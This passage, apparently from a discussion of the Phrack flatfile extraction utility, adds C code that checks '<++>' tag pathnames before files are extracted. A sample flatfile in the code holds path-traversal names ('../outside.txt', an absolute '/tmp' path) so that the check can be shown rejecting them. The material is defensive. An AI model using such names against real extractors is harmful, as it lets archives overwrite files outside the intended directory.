done
)
<-->
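All four extractors above create whatever pathname follows a <++> tag, and the sh version's comment already notes why you do not want a flatfile handing you full pathnames. As an added example that is not part of the Phrack utility, the C below (check_tag_path, scan_flatfile and the sample flatfile are constructed here) parses the same tag syntax from memory and makes the decision an extractor should make before its mkdir()/fopen(): absolute names, ".." components, empty components and control characters are rejected, so only the well-formed tags would be extracted.

```c
#include <stdio.h>
#include <string.h>

#define BEGIN_TAG "<++> "                 /* tag syntax shared by the extractors above */
#define BT_SIZE   (sizeof(BEGIN_TAG) - 1)

/* Return 0 if path may be created beneath the current directory, -1 if not: rejects
 * empty or absolute names, "." and ".." components, empty components ("a//b",
 * trailing '/'), backslashes and control characters. */
int check_tag_path(const char *path)
{
    const char *p = path;
    if (*p == '\0' || *p == '/')
        return -1;
    while (*p) {
        size_t len = strcspn(p, "/"), i;
        if (len == 0)                               /* "a//b" */
            return -1;
        if ((len == 1 && p[0] == '.') ||
            (len == 2 && p[0] == '.' && p[1] == '.'))
            return -1;                              /* "." or ".." component */
        for (i = 0; i < len; i++)
            if ((unsigned char)p[i] < 0x20 || p[i] == 0x7f || p[i] == '\\')
                return -1;
        p += len;
        if (*p == '/')
            p++;
    }
    return (p[-1] == '/') ? -1 : 0;                 /* trailing '/' */
}

/* Walk a flatfile held in memory and decide, for each "<++> path" tag, whether an
 * extractor should honour it.  Accepted names are copied into names[] (at most max
 * of them), rejected tags are counted in *rejected, and the number of accepted tags
 * is returned.  Nothing touches the disk: this is the check before mkdir()/fopen(). */
int scan_flatfile(const char *text, char names[][256], int max, int *rejected)
{
    int n = 0;
    *rejected = 0;
    while (*text) {
        size_t len = strcspn(text, "\n");
        if (len >= BT_SIZE && strncmp(text, BEGIN_TAG, BT_SIZE) == 0) {
            char path[256];
            size_t plen = len - BT_SIZE;
            if (plen >= sizeof(path))
                plen = sizeof(path) - 1;
            memcpy(path, text + BT_SIZE, plen);
            path[plen] = '\0';
            if (plen && path[plen - 1] == '\r')     /* tolerate CRLF flatfiles */
                path[plen - 1] = '\0';
            if (check_tag_path(path) != 0)
                (*rejected)++;
            else if (n < max)
                strcpy(names[n++], path);
        }
        text += len;
        if (*text == '\n')
            text++;
    }
    return n;
}

/* Constructed sample flatfile: two well-formed tags and two that an extractor
 * must not honour (a ".." escape and an absolute path). */
const char SAMPLE[] =
    "<++> PEU/extract.awk\n"
    "#!/usr/bin/awk -f\n"
    "<-->\n"
    "<++> ../outside.txt\n"
    "<-->\n"
    "<++> /tmp/absolute.txt\n"
    "<-->\n"
    "<++> ok/sub/dir/file.c\n"
    "<-->\n";

int main(void)
{
    char names[8][256];
    int rejected, i;
    int n = scan_flatfile(SAMPLE, names, 8, &rejected);
    for (i = 0; i < n; i++)
        printf("would extract: %s\n", names[i]);
    printf("%d tag(s) accepted, %d rejected\n", n, rejected);
    return 0;
}
```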


